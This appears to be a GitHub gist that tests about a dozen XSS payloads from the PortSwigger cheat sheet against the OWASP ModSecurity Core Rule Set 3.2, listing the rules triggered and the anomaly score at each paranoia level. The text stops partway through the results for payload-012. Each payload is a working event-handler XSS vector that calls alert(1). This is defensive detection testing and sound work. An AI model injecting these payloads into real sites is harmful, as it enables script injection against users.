Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@dune73
Created September 27, 2019 22:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dune73/67400bf4d1e23848564ad73c679fcbe5 to your computer and use it in GitHub Desktop.
Save dune73/67400bf4d1e23848564ad73c679fcbe5 to your computer and use it in GitHub Desktop.
Portswigger XSS Cheatsheet vs OWASP ModSecurity CRS 3.2
Cheatsheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Extractedover 250 payloads and sent them against CRS 3.2
****** payload-000 ********
Payload:
payload=<a id=x tabindex=1 onactivate=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-001 ********
Payload:
payload=<body onafterprint=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-002 ********
Payload:
payload=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style=&quot;position:absolute;&quot; onanimationcancel=&quot;alert(1)&quot;></a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 33
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 52
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 94
****** payload-003 ********
Payload:
payload=<style>@keyframes x{}</style><a style=&quot;animation-name:x&quot; onanimationend=&quot;alert(1)&quot;></a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 49
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 91
****** payload-004 ********
Payload:
payload=<style>@keyframes slidein {}</style><a style=&quot;animation-duration:1s;animation-name:slidein;animation-iteration-count:2&quot; onanimationiteration=&quot;alert(1)&quot;></a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 52
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 94
****** payload-005 ********
Payload:
payload=<style>@keyframes x{}</style><a style=&quot;animation-name:x&quot; onanimationstart=&quot;alert(1)&quot;></a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 49
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 91
****** payload-006 ********
Payload:
payload=<a id=x tabindex=1 onbeforeactivate=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-007 ********
Payload:
payload=<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus></a>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-008 ********
Payload:
payload=<body onbeforeprint=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-009 ********
Payload:
payload=<body onbeforeunload=&quot;location=&#039;javascript:alert(1)&#039;&quot;></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 40
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-010 ********
Payload:
payload=<svg><animate onbegin=alert(1) attributeName=x dur=1s></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
****** payload-011 ********
Payload:
payload=<a onblur=alert(1) tabindex=1 id=x></a><input autofocus></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-012 ********
Payload:
payload=<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
